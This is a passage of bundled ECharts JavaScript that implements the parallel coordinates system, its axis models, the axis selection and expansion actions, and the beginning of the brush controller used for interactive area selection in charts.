{\n        // If minSpan exists, 'cross' is forbidden.\n        handleEnds[1 - handleIndex] = handleEnds[handleIndex] + originalDistSign.sign * minSpan;\n    }\n\n    // Shrink span.\n    var currDistSign = getSpanSign(handleEnds, handleIndex);\n    if (maxSpan != null && currDistSign.span > maxSpan) {\n        handleEnds[1 - handleIndex] = handleEnds[handleIndex] + currDistSign.sign * maxSpan;\n    }\n\n    return handleEnds;\n};\n\nfunction getSpanSign(handleEnds, handleIndex) {\n    var dist = handleEnds[handleIndex] - handleEnds[1 - handleIndex];\n    // If `handleEnds[0] === handleEnds[1]`, always believe that handleEnd[0]\n    // is at left of handleEnds[1] for non-cross case.\n    return {span: Math.abs(dist), sign: dist > 0 ? -1 : dist < 0 ? 1 : handleIndex ? -1 : 1};\n}\n\nfunction restrict$1(value, extend) {\n    return Math.min(\n        extend[1] != null ? extend[1] : Infinity,\n        Math.max(extend[0] != null ? extend[0] : -Infinity, value)\n    );\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Parallel Coordinates\n * <https://en.wikipedia.org/wiki/Parallel_coordinates>\n */\n\nvar each$11 = each$1;\nvar mathMin$6 = Math.min;\nvar mathMax$6 = Math.max;\nvar mathFloor$2 = Math.floor;\nvar mathCeil$2 = Math.ceil;\nvar round$2 = round$1;\n\nvar PI$4 = Math.PI;\n\nfunction Parallel(parallelModel, ecModel, api) {\n\n    /**\n     * key: dimension\n     * @type {Object.<string, module:echarts/coord/parallel/Axis>}\n     * @private\n     */\n    this._axesMap = createHashMap();\n\n    /**\n     * key: dimension\n     * value: {position: [], rotation, }\n     * @type {Object.<string, Object>}\n     * @private\n     */\n    this._axesLayout = {};\n\n    /**\n     * Always follow axis order.\n     * @type {Array.<string>}\n     * @readOnly\n     */\n    this.dimensions = parallelModel.dimensions;\n\n    /**\n     * @type {module:zrender/core/BoundingRect}\n     */\n    this._rect;\n\n    /**\n     * @type {module:echarts/coord/parallel/ParallelModel}\n     */\n    this._model = parallelModel;\n\n    this._init(parallelModel, ecModel, api);\n}\n\nParallel.prototype = {\n\n    type: 'parallel',\n\n    constructor: Parallel,\n\n    /**\n     * Initialize cartesian coordinate systems\n     * @private\n     */\n    _init: function (parallelModel, ecModel, api) {\n\n        var dimensions = parallelModel.dimensions;\n        var parallelAxisIndex = parallelModel.parallelAxisIndex;\n\n        each$11(dimensions, function (dim, idx) {\n\n            var axisIndex = parallelAxisIndex[idx];\n            var axisModel = ecModel.getComponent('parallelAxis', axisIndex);\n\n            var axis = this._axesMap.set(dim, new ParallelAxis(\n                dim,\n                createScaleByModel(axisModel),\n                [0, 0],\n                axisModel.get('type'),\n                axisIndex\n            ));\n\n            var isCategory = axis.type === 'category';\n            axis.onBand = isCategory && axisModel.get('boundaryGap');\n            axis.inverse = axisModel.get('inverse');\n\n            // Injection\n            axisModel.axis = axis;\n            axis.model = axisModel;\n            axis.coordinateSystem = axisModel.coordinateSystem = this;\n\n        }, this);\n    },\n\n    /**\n     * Update axis scale after data processed\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    update: function (ecModel, api) {\n        this._updateAxesFromSeries(this._model, ecModel);\n    },\n\n    /**\n     * @override\n     */\n    containPoint: function (point) {\n        var layoutInfo = this._makeLayoutInfo();\n        var axisBase = layoutInfo.axisBase;\n        var layoutBase = layoutInfo.layoutBase;\n        var pixelDimIndex = layoutInfo.pixelDimIndex;\n        var pAxis = point[1 - pixelDimIndex];\n        var pLayout = point[pixelDimIndex];\n\n        return pAxis >= axisBase\n            && pAxis <= axisBase + layoutInfo.axisLength\n            && pLayout >= layoutBase\n            && pLayout <= layoutBase + layoutInfo.layoutLength;\n    },\n\n    getModel: function () {\n        return this._model;\n    },\n\n    /**\n     * Update properties from series\n     * @private\n     */\n    _updateAxesFromSeries: function (parallelModel, ecModel) {\n        ecModel.eachSeries(function (seriesModel) {\n\n            if (!parallelModel.contains(seriesModel, ecModel)) {\n                return;\n            }\n\n            var data = seriesModel.getData();\n\n            each$11(this.dimensions, function (dim) {\n                var axis = this._axesMap.get(dim);\n                axis.scale.unionExtentFromData(data, data.mapDimension(dim));\n                niceScaleExtent(axis.scale, axis.model);\n            }, this);\n        }, this);\n    },\n\n    /**\n     * Resize the parallel coordinate system.\n     * @param {module:echarts/coord/parallel/ParallelModel} parallelModel\n     * @param {module:echarts/ExtensionAPI} api\n     */\n    resize: function (parallelModel, api) {\n        this._rect = getLayoutRect(\n            parallelModel.getBoxLayoutParams(),\n            {\n                width: api.getWidth(),\n                height: api.getHeight()\n            }\n        );\n\n        this._layoutAxes();\n    },\n\n    /**\n     * @return {module:zrender/core/BoundingRect}\n     */\n    getRect: function () {\n        return this._rect;\n    },\n\n    /**\n     * @private\n     */\n    _makeLayoutInfo: function () {\n        var parallelModel = this._model;\n        var rect = this._rect;\n        var xy = ['x', 'y'];\n        var wh = ['width', 'height'];\n        var layout = parallelModel.get('layout');\n        var pixelDimIndex = layout === 'horizontal' ? 0 : 1;\n        var layoutLength = rect[wh[pixelDimIndex]];\n        var layoutExtent = [0, layoutLength];\n        var axisCount = this.dimensions.length;\n\n        var axisExpandWidth = restrict(parallelModel.get('axisExpandWidth'), layoutExtent);\n        var axisExpandCount = restrict(parallelModel.get('axisExpandCount') || 0, [0, axisCount]);\n        var axisExpandable = parallelModel.get('axisExpandable')\n            && axisCount > 3\n            && axisCount > axisExpandCount\n            && axisExpandCount > 1\n            && axisExpandWidth > 0\n            && layoutLength > 0;\n\n        // `axisExpandWindow` is According to the coordinates of [0, axisExpandLength],\n        // for sake of consider the case that axisCollapseWidth is 0 (when screen is narrow),\n        // where collapsed axes should be overlapped.\n        var axisExpandWindow = parallelModel.get('axisExpandWindow');\n        var winSize;\n        if (!axisExpandWindow) {\n            winSize = restrict(axisExpandWidth * (axisExpandCount - 1), layoutExtent);\n            var axisExpandCenter = parallelModel.get('axisExpandCenter') || mathFloor$2(axisCount / 2);\n            axisExpandWindow = [axisExpandWidth * axisExpandCenter - winSize / 2];\n            axisExpandWindow[1] = axisExpandWindow[0] + winSize;\n        }\n        else {\n                winSize = restrict(axisExpandWindow[1] - axisExpandWindow[0], layoutExtent);\n                axisExpandWindow[1] = axisExpandWindow[0] + winSize;\n        }\n\n        var axisCollapseWidth = (layoutLength - winSize) / (axisCount - axisExpandCount);\n        // Avoid axisCollapseWidth is too small.\n        axisCollapseWidth < 3 && (axisCollapseWidth = 0);\n\n        // Find the first and last indices > ewin[0] and < ewin[1].\n        var winInnerIndices = [\n            mathFloor$2(round$2(axisExpandWindow[0] / axisExpandWidth, 1)) + 1,\n            mathCeil$2(round$2(axisExpandWindow[1] / axisExpandWidth, 1)) - 1\n        ];\n\n        // Pos in ec coordinates.\n        var axisExpandWindow0Pos = axisCollapseWidth / axisExpandWidth * axisExpandWindow[0];\n\n        return {\n            layout: layout,\n            pixelDimIndex: pixelDimIndex,\n            layoutBase: rect[xy[pixelDimIndex]],\n            layoutLength: layoutLength,\n            axisBase: rect[xy[1 - pixelDimIndex]],\n            axisLength: rect[wh[1 - pixelDimIndex]],\n            axisExpandable: axisExpandable,\n            axisExpandWidth: axisExpandWidth,\n            axisCollapseWidth: axisCollapseWidth,\n            axisExpandWindow: axisExpandWindow,\n            axisCount: axisCount,\n            winInnerIndices: winInnerIndices,\n            axisExpandWindow0Pos: axisExpandWindow0Pos\n        };\n    },\n\n    /**\n     * @private\n     */\n    _layoutAxes: function () {\n        var rect = this._rect;\n        var axes = this._axesMap;\n        var dimensions = this.dimensions;\n        var layoutInfo = this._makeLayoutInfo();\n        var layout = layoutInfo.layout;\n\n        axes.each(function (axis) {\n            var axisExtent = [0, layoutInfo.axisLength];\n            var idx = axis.inverse ? 1 : 0;\n            axis.setExtent(axisExtent[idx], axisExtent[1 - idx]);\n        });\n\n        each$11(dimensions, function (dim, idx) {\n            var posInfo = (layoutInfo.axisExpandable\n                ? layoutAxisWithExpand : layoutAxisWithoutExpand\n            )(idx, layoutInfo);\n\n            var positionTable = {\n                horizontal: {\n                    x: posInfo.position,\n                    y: layoutInfo.axisLength\n                },\n                vertical: {\n                    x: 0,\n                    y: posInfo.position\n                }\n            };\n            var rotationTable = {\n                horizontal: PI$4 / 2,\n                vertical: 0\n            };\n\n            var position = [\n                positionTable[layout].x + rect.x,\n                positionTable[layout].y + rect.y\n            ];\n\n            var rotation = rotationTable[layout];\n            var transform = create$1();\n            rotate(transform, transform, rotation);\n            translate(transform, transform, position);\n\n            // TODO\n            // tick等排布信息。\n\n            // TODO\n            // 根据axis order 更新 dimensions顺序。\n\n            this._axesLayout[dim] = {\n                position: position,\n                rotation: rotation,\n                transform: transform,\n                axisNameAvailableWidth: posInfo.axisNameAvailableWidth,\n                axisLabelShow: posInfo.axisLabelShow,\n                nameTruncateMaxWidth: posInfo.nameTruncateMaxWidth,\n                tickDirection: 1,\n                labelDirection: 1\n            };\n        }, this);\n    },\n\n    /**\n     * Get axis by dim.\n     * @param {string} dim\n     * @return {module:echarts/coord/parallel/ParallelAxis} [description]\n     */\n    getAxis: function (dim) {\n        return this._axesMap.get(dim);\n    },\n\n    /**\n     * Convert a dim value of a single item of series data to Point.\n     * @param {*} value\n     * @param {string} dim\n     * @return {Array}\n     */\n    dataToPoint: function (value, dim) {\n        return this.axisCoordToPoint(\n            this._axesMap.get(dim).dataToCoord(value),\n            dim\n        );\n    },\n\n    /**\n     * Travel data for one time, get activeState of each data item.\n     * @param {module:echarts/data/List} data\n     * @param {Functio} cb param: {string} activeState 'active' or 'inactive' or 'normal'\n     *                            {number} dataIndex\n     * @param {number} [start=0] the start dataIndex that travel from.\n     * @param {number} [end=data.count()] the next dataIndex of the last dataIndex will be travel.\n     */\n    eachActiveState: function (data, callback, start, end) {\n        start == null && (start = 0);\n        end == null && (end = data.count());\n\n        var axesMap = this._axesMap;\n        var dimensions = this.dimensions;\n        var dataDimensions = [];\n        var axisModels = [];\n\n        each$1(dimensions, function (axisDim) {\n            dataDimensions.push(data.mapDimension(axisDim));\n            axisModels.push(axesMap.get(axisDim).model);\n        });\n\n        var hasActiveSet = this.hasAxisBrushed();\n\n        for (var dataIndex = start; dataIndex < end; dataIndex++) {\n            var activeState;\n\n            if (!hasActiveSet) {\n                activeState = 'normal';\n            }\n            else {\n                activeState = 'active';\n                var values = data.getValues(dataDimensions, dataIndex);\n                for (var j = 0, lenj = dimensions.length; j < lenj; j++) {\n                    var state = axisModels[j].getActiveState(values[j]);\n\n                    if (state === 'inactive') {\n                        activeState = 'inactive';\n                        break;\n                    }\n                }\n            }\n\n            callback(activeState, dataIndex);\n        }\n    },\n\n    /**\n     * Whether has any activeSet.\n     * @return {boolean}\n     */\n    hasAxisBrushed: function () {\n        var dimensions = this.dimensions;\n        var axesMap = this._axesMap;\n        var hasActiveSet = false;\n\n        for (var j = 0, lenj = dimensions.length; j < lenj; j++) {\n            if (axesMap.get(dimensions[j]).model.getActiveState() !== 'normal') {\n                hasActiveSet = true;\n            }\n        }\n\n        return hasActiveSet;\n    },\n\n    /**\n     * Convert coords of each axis to Point.\n     *  Return point. For example: [10, 20]\n     * @param {Array.<number>} coords\n     * @param {string} dim\n     * @return {Array.<number>}\n     */\n    axisCoordToPoint: function (coord, dim) {\n        var axisLayout = this._axesLayout[dim];\n        return applyTransform$1([coord, 0], axisLayout.transform);\n    },\n\n    /**\n     * Get axis layout.\n     */\n    getAxisLayout: function (dim) {\n        return clone(this._axesLayout[dim]);\n    },\n\n    /**\n     * @param {Array.<number>} point\n     * @return {Object} {axisExpandWindow, delta, behavior: 'jump' | 'slide' | 'none'}.\n     */\n    getSlidedAxisExpandWindow: function (point) {\n        var layoutInfo = this._makeLayoutInfo();\n        var pixelDimIndex = layoutInfo.pixelDimIndex;\n        var axisExpandWindow = layoutInfo.axisExpandWindow.slice();\n        var winSize = axisExpandWindow[1] - axisExpandWindow[0];\n        var extent = [0, layoutInfo.axisExpandWidth * (layoutInfo.axisCount - 1)];\n\n        // Out of the area of coordinate system.\n        if (!this.containPoint(point)) {\n            return {behavior: 'none', axisExpandWindow: axisExpandWindow};\n        }\n\n        // Conver the point from global to expand coordinates.\n        var pointCoord = point[pixelDimIndex] - layoutInfo.layoutBase - layoutInfo.axisExpandWindow0Pos;\n\n        // For dragging operation convenience, the window should not be\n        // slided when mouse is the center area of the window.\n        var delta;\n        var behavior = 'slide';\n        var axisCollapseWidth = layoutInfo.axisCollapseWidth;\n        var triggerArea = this._model.get('axisExpandSlideTriggerArea');\n        // But consider touch device, jump is necessary.\n        var useJump = triggerArea[0] != null;\n\n        if (axisCollapseWidth) {\n            if (useJump && axisCollapseWidth && pointCoord < winSize * triggerArea[0]) {\n                behavior = 'jump';\n                delta = pointCoord - winSize * triggerArea[2];\n            }\n            else if (useJump && axisCollapseWidth && pointCoord > winSize * (1 - triggerArea[0])) {\n                behavior = 'jump';\n                delta = pointCoord - winSize * (1 - triggerArea[2]);\n            }\n            else {\n                (delta = pointCoord - winSize * triggerArea[1]) >= 0\n                    && (delta = pointCoord - winSize * (1 - triggerArea[1])) <= 0\n                    && (delta = 0);\n            }\n            delta *= layoutInfo.axisExpandWidth / axisCollapseWidth;\n            delta\n                ? sliderMove(delta, axisExpandWindow, extent, 'all')\n                // Avoid nonsense triger on mousemove.\n                : (behavior = 'none');\n        }\n        // When screen is too narrow, make it visible and slidable, although it is hard to interact.\n        else {\n            var winSize = axisExpandWindow[1] - axisExpandWindow[0];\n            var pos = extent[1] * pointCoord / winSize;\n            axisExpandWindow = [mathMax$6(0, pos - winSize / 2)];\n            axisExpandWindow[1] = mathMin$6(extent[1], axisExpandWindow[0] + winSize);\n            axisExpandWindow[0] = axisExpandWindow[1] - winSize;\n        }\n\n        return {\n            axisExpandWindow: axisExpandWindow,\n            behavior: behavior\n        };\n    }\n};\n\nfunction restrict(len, extent) {\n    return mathMin$6(mathMax$6(len, extent[0]), extent[1]);\n}\n\nfunction layoutAxisWithoutExpand(axisIndex, layoutInfo) {\n    var step = layoutInfo.layoutLength / (layoutInfo.axisCount - 1);\n    return {\n        position: step * axisIndex,\n        axisNameAvailableWidth: step,\n        axisLabelShow: true\n    };\n}\n\nfunction layoutAxisWithExpand(axisIndex, layoutInfo) {\n    var layoutLength = layoutInfo.layoutLength;\n    var axisExpandWidth = layoutInfo.axisExpandWidth;\n    var axisCount = layoutInfo.axisCount;\n    var axisCollapseWidth = layoutInfo.axisCollapseWidth;\n    var winInnerIndices = layoutInfo.winInnerIndices;\n\n    var position;\n    var axisNameAvailableWidth = axisCollapseWidth;\n    var axisLabelShow = false;\n    var nameTruncateMaxWidth;\n\n    if (axisIndex < winInnerIndices[0]) {\n        position = axisIndex * axisCollapseWidth;\n        nameTruncateMaxWidth = axisCollapseWidth;\n    }\n    else if (axisIndex <= winInnerIndices[1]) {\n        position = layoutInfo.axisExpandWindow0Pos\n            + axisIndex * axisExpandWidth - layoutInfo.axisExpandWindow[0];\n        axisNameAvailableWidth = axisExpandWidth;\n        axisLabelShow = true;\n    }\n    else {\n        position = layoutLength - (axisCount - 1 - axisIndex) * axisCollapseWidth;\n        nameTruncateMaxWidth = axisCollapseWidth;\n    }\n\n    return {\n        position: position,\n        axisNameAvailableWidth: axisNameAvailableWidth,\n        axisLabelShow: axisLabelShow,\n        nameTruncateMaxWidth: nameTruncateMaxWidth\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Parallel coordinate system creater.\n */\n\nfunction create$2(ecModel, api) {\n    var coordSysList = [];\n\n    ecModel.eachComponent('parallel', function (parallelModel, idx) {\n        var coordSys = new Parallel(parallelModel, ecModel, api);\n\n        coordSys.name = 'parallel_' + idx;\n        coordSys.resize(parallelModel, api);\n\n        parallelModel.coordinateSystem = coordSys;\n        coordSys.model = parallelModel;\n\n        coordSysList.push(coordSys);\n    });\n\n    // Inject the coordinateSystems into seriesModel\n    ecModel.eachSeries(function (seriesModel) {\n        if (seriesModel.get('coordinateSystem') === 'parallel') {\n            var parallelModel = ecModel.queryComponents({\n                mainType: 'parallel',\n                index: seriesModel.get('parallelIndex'),\n                id: seriesModel.get('parallelId')\n            })[0];\n            seriesModel.coordinateSystem = parallelModel.coordinateSystem;\n        }\n    });\n\n    return coordSysList;\n}\n\nCoordinateSystemManager.register('parallel', {create: create$2});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar AxisModel$2 = ComponentModel.extend({\n\n    type: 'baseParallelAxis',\n\n    /**\n     * @type {module:echarts/coord/parallel/Axis}\n     */\n    axis: null,\n\n    /**\n     * @type {Array.<Array.<number>}\n     * @readOnly\n     */\n    activeIntervals: [],\n\n    /**\n     * @return {Object}\n     */\n    getAreaSelectStyle: function () {\n        return makeStyleMapper(\n            [\n                ['fill', 'color'],\n                ['lineWidth', 'borderWidth'],\n                ['stroke', 'borderColor'],\n                ['width', 'width'],\n                ['opacity', 'opacity']\n            ]\n        )(this.getModel('areaSelectStyle'));\n    },\n\n    /**\n     * The code of this feature is put on AxisModel but not ParallelAxis,\n     * because axisModel can be alive after echarts updating but instance of\n     * ParallelAxis having been disposed. this._activeInterval should be kept\n     * when action dispatched (i.e. legend click).\n     *\n     * @param {Array.<Array<number>>} intervals interval.length === 0\n     *                                          means set all active.\n     * @public\n     */\n    setActiveIntervals: function (intervals) {\n        var activeIntervals = this.activeIntervals = clone(intervals);\n\n        // Normalize\n        if (activeIntervals) {\n            for (var i = activeIntervals.length - 1; i >= 0; i--) {\n                asc(activeIntervals[i]);\n            }\n        }\n    },\n\n    /**\n     * @param {number|string} [value] When attempting to detect 'no activeIntervals set',\n     *                         value can not be input.\n     * @return {string} 'normal': no activeIntervals set,\n     *                  'active',\n     *                  'inactive'.\n     * @public\n     */\n    getActiveState: function (value) {\n        var activeIntervals = this.activeIntervals;\n\n        if (!activeIntervals.length) {\n            return 'normal';\n        }\n\n        if (value == null || isNaN(value)) {\n            return 'inactive';\n        }\n\n        // Simple optimization\n        if (activeIntervals.length === 1) {\n            var interval = activeIntervals[0];\n            if (interval[0] <= value && value <= interval[1]) {\n                return 'active';\n            }\n        }\n        else {\n            for (var i = 0, len = activeIntervals.length; i < len; i++) {\n                if (activeIntervals[i][0] <= value && value <= activeIntervals[i][1]) {\n                    return 'active';\n                }\n            }\n        }\n\n        return 'inactive';\n    }\n\n});\n\nvar defaultOption$1 = {\n\n    type: 'value',\n\n    /**\n     * @type {Array.<number>}\n     */\n    dim: null, // 0, 1, 2, ...\n\n    // parallelIndex: null,\n\n    areaSelectStyle: {\n        width: 20,\n        borderWidth: 1,\n        borderColor: 'rgba(160,197,232)',\n        color: 'rgba(160,197,232)',\n        opacity: 0.3\n    },\n\n    realtime: true, // Whether realtime update view when select.\n\n    z: 10\n};\n\nmerge(AxisModel$2.prototype, axisModelCommonMixin);\n\nfunction getAxisType$1(axisName, option) {\n    return option.type || (option.data ? 'category' : 'value');\n}\n\naxisModelCreator('parallel', AxisModel$2, getAxisType$1, defaultOption$1);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nComponentModel.extend({\n\n    type: 'parallel',\n\n    dependencies: ['parallelAxis'],\n\n    /**\n     * @type {module:echarts/coord/parallel/Parallel}\n     */\n    coordinateSystem: null,\n\n    /**\n     * Each item like: 'dim0', 'dim1', 'dim2', ...\n     * @type {Array.<string>}\n     * @readOnly\n     */\n    dimensions: null,\n\n    /**\n     * Coresponding to dimensions.\n     * @type {Array.<number>}\n     * @readOnly\n     */\n    parallelAxisIndex: null,\n\n    layoutMode: 'box',\n\n    defaultOption: {\n        zlevel: 0,\n        z: 0,\n        left: 80,\n        top: 60,\n        right: 80,\n        bottom: 60,\n        // width: {totalWidth} - left - right,\n        // height: {totalHeight} - top - bottom,\n\n        layout: 'horizontal',      // 'horizontal' or 'vertical'\n\n        // FIXME\n        // naming?\n        axisExpandable: false,\n        axisExpandCenter: null,\n        axisExpandCount: 0,\n        axisExpandWidth: 50,      // FIXME '10%' ?\n        axisExpandRate: 17,\n        axisExpandDebounce: 50,\n        // [out, in, jumpTarget]. In percentage. If use [null, 0.05], null means full.\n        // Do not doc to user until necessary.\n        axisExpandSlideTriggerArea: [-0.15, 0.05, 0.4],\n        axisExpandTriggerOn: 'click', // 'mousemove' or 'click'\n\n        parallelAxisDefault: null\n    },\n\n    /**\n     * @override\n     */\n    init: function () {\n        ComponentModel.prototype.init.apply(this, arguments);\n\n        this.mergeOption({});\n    },\n\n    /**\n     * @override\n     */\n    mergeOption: function (newOption) {\n        var thisOption = this.option;\n\n        newOption && merge(thisOption, newOption, true);\n\n        this._initDimensions();\n    },\n\n    /**\n     * Whether series or axis is in this coordinate system.\n     * @param {module:echarts/model/Series|module:echarts/coord/parallel/AxisModel} model\n     * @param {module:echarts/model/Global} ecModel\n     */\n    contains: function (model, ecModel) {\n        var parallelIndex = model.get('parallelIndex');\n        return parallelIndex != null\n            && ecModel.getComponent('parallel', parallelIndex) === this;\n    },\n\n    setAxisExpand: function (opt) {\n        each$1(\n            ['axisExpandable', 'axisExpandCenter', 'axisExpandCount', 'axisExpandWidth', 'axisExpandWindow'],\n            function (name) {\n                if (opt.hasOwnProperty(name)) {\n                    this.option[name] = opt[name];\n                }\n            },\n            this\n        );\n    },\n\n    /**\n     * @private\n     */\n    _initDimensions: function () {\n        var dimensions = this.dimensions = [];\n        var parallelAxisIndex = this.parallelAxisIndex = [];\n\n        var axisModels = filter(this.dependentModels.parallelAxis, function (axisModel) {\n            // Can not use this.contains here, because\n            // initialization has not been completed yet.\n            return (axisModel.get('parallelIndex') || 0) === this.componentIndex;\n        }, this);\n\n        each$1(axisModels, function (axisModel) {\n            dimensions.push('dim' + axisModel.get('dim'));\n            parallelAxisIndex.push(axisModel.componentIndex);\n        });\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @payload\n * @property {string} parallelAxisId\n * @property {Array.<Array.<number>>} intervals\n */\nvar actionInfo$1 = {\n    type: 'axisAreaSelect',\n    event: 'axisAreaSelected'\n    // update: 'updateVisual'\n};\n\nregisterAction(actionInfo$1, function (payload, ecModel) {\n    ecModel.eachComponent(\n        {mainType: 'parallelAxis', query: payload},\n        function (parallelAxisModel) {\n            parallelAxisModel.axis.model.setActiveIntervals(payload.intervals);\n        }\n    );\n});\n\n/**\n * @payload\n */\nregisterAction('parallelAxisExpand', function (payload, ecModel) {\n    ecModel.eachComponent(\n        {mainType: 'parallel', query: payload},\n        function (parallelModel) {\n            parallelModel.setAxisExpand(payload);\n        }\n    );\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar curry$2 = curry;\nvar each$12 = each$1;\nvar map$2 = map;\nvar mathMin$7 = Math.min;\nvar mathMax$7 = Math.max;\nvar mathPow$2 = Math.pow;\n\nvar COVER_Z = 10000;\nvar UNSELECT_THRESHOLD = 6;\nvar MIN_RESIZE_LINE_WIDTH = 6;\nvar MUTEX_RESOURCE_KEY = 'globalPan';\n\nvar DIRECTION_MAP = {\n    w: [0, 0],\n    e: [0, 1],\n    n: [1, 0],\n    s: [1, 1]\n};\nvar CURSOR_MAP = {\n    w: 'ew',\n    e: 'ew',\n    n: 'ns',\n    s: 'ns',\n    ne: 'nesw',\n    sw: 'nesw',\n    nw: 'nwse',\n    se: 'nwse'\n};\nvar DEFAULT_BRUSH_OPT = {\n    brushStyle: {\n        lineWidth: 2,\n        stroke: 'rgba(0,0,0,0.3)',\n        fill: 'rgba(0,0,0,0.1)'\n    },\n    transformable: true,\n    brushMode: 'single',\n    removeOnClick: false\n};\n\nvar baseUID = 0;\n\n/**\n * @alias module:echarts/component/helper/BrushController\n * @constructor\n * @mixin {module:zrender/mixin/Eventful}\n * @event module:echarts/component/helper/BrushController#brush\n *        params:\n *            areas: Array.<Array>, coord relates to container group,\n *                                    If no container specified, to global.\n *            opt {\n *                isEnd: boolean,\n *                removeOnClick: boolean\n *            }\n *\n * @param {module:zrender/zrender~ZRender} zr\n */\nfunction BrushController(zr) {\n\n    if (__DEV__) {\n        assert$1(zr);\n    }\n\n    Eventful.call(this);\n\n    /**\n     * @type {module:zrender/zrender~ZRender}\n     * @private\n     */\n    this._zr = zr;\n\n    /**\n     * @type {module:zrender/container/Group}\n     * @readOnly\n     */\n    this.group = new Group();\n\n    /**\n     * Only for drawing (after enabledBrush).\n     *     'line', 'rect', 'polygon' or false\n     *     If passing false/null/undefined, disable brush.\n     *     If passing 'auto', determined by panel.defaultBrushType\n     * @private\n     * @type {string}\n     */\n    this._brushType;\n\n    /**\n     * Only for drawing (after enabledBrush).\n     *\n     * @private\n     * @type {Object}\n     */\n    this._brushOption;\n\n    /**\n     * @private\n     * @type {Object}\n     */\n    this._panels;\n\n    /**\n     * @private\n     * @type {Array.<nubmer>}\n     */\n    this._track = [];\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    this._dragging;\n\n    /**\n     * @private\n     * @type {Array}\n     */\n    this._covers = [];\n\n    /**\n     * @private\n     * @type {moudule:zrender/container/Group}\n     */\n    this._creatingCover;\n\n    /**\n     * `true` means global panel\n     * @private\n     * @type {module:zrender/container/Group|boolean}\n     */\n    this._creatingPanel;\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    this._enableGlobalPan;\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    if (__DEV__) {\n        this._mounted;\n    }\n\n    /**\n     * @private\n     * @type {string}\n     */\n    this._uid = 'brushController_' + baseUID++;\n\n    /**\n     * @private\n     * @type {Object}\n     */\n    this._handlers = {};\n\n    each$12(pointerHandlers, function (handler, eventName) {\n        this._handlers[eventName] = bind(handler, this);\n    }, this);\n}\n\nBrushController.prototype = {\n\n    constructor: BrushController,\n\n    /**\n     * If set to null/undefined/false, select disabled.\n     * @param {Object} brushOption\n     * @param {string|boolean} brushOption.brushType 'line', 'rect', 'polygon' or false\n     *                          If passing false/null/undefined, disable brush.\n     *                          If passing 'auto', determined by panel.defaultBrushType.\n     *                              ('auto' can not be used in global panel)\n     * @param {number} [brushOption.brushMode='single'] 'single' or 'multiple'\n     * @param {boolean} [brushOption.transformable=true]\n     * @param {boolean} [brushOption.removeOnClick=false]\n     * @param {Object} [brushOption.brushStyle]\n     * @param {number} [brushOption.brushStyle.width]\n     * @param {number} [brushOption.brushStyle.lineWidth]\n     * @param {string} [brushOption.brushStyle.stroke]\n     * @param {string} [brushOption.brushStyle.fill]\n     * @param {number} 